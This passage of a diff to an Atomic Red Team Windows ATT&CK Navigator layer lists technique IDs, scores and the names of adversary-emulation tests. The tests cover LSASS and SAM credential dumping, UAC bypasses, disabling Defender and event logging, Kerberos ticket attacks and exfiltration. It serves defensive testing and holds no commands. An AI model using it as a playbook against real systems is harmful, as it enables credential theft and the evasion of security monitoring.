SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View 